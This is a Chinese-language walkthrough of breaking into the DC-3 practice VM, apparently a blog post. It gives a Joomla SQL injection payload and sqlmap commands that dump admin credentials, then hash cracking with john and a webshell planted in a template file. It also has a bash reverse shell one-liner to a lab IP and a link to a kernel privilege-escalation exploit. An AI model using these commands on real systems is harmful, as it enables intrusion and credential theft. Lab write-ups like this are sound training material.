DC-3靶机渗透实战

DC-3靶机渗透

咱们速战速决！我尽量详细一点
打开靶机，nat模式，nmap主机发现，全扫描

80端口，joomla 框架，打开御剑扫描器扫到后台路径和README.txt文件
获得了版本

这个版本有个sql注入漏洞，直接找来payload验证一下
index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1)
确实存在注入漏洞
直接上sqlmap
sqlmap -u "http://192.168.206.143/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=*
" --risk 3 --level 5 --dbs
拿到管理员账号：
sqlmap -u “http://192.168.206.143/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=*” --risk 3 -D joomladb -T “#__users” -C username,password --dump

这里我测试一下，还有另一种方法，我们数据库所在的账号是dba，直接写一句话木马
这里用hash爆破一下口令，把加密的hash串保存成txt文件，然后kali自带的john，输入命令john 文件名
爆破出来为snoopy，？？？？？？？？？？？？？？？
然后登陆后台

找到Protostar 这个模板，然后进去改index.php文件内容，当然你随便改哪个php文件都可，加入一句话

保存，并退出，这里我刚开始上了一个get的，菜刀蚁剑怎么都连不上，后面我换了一个post就可以了

验证一下，然后蚁剑连
cmd下
反弹shell
bash -c ‘sh -i &>/dev/tcp/192.168.206.128/4444 0>&1’
用nc均没有成功，就这个可以
然后连上去了，发现是网站用户，各种suid提权没成功，发现内核版本为ubentu16. 内核4.4
用内核提权
提权exp
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip

解压里面的exploit压缩包，用另一个压缩包没成功
然后把doubleput.c本地编译成二进制文件，把所有文件都上传到服务器
先授权给sh脚本

记得把所有的.c文件都上传，除了doubleput.c，上传编译好的脚本
成功读取flag文件

最近在忙自己的博客，没学过node.js，感觉配置起来好难，弄好了，写一个搭建指南吧！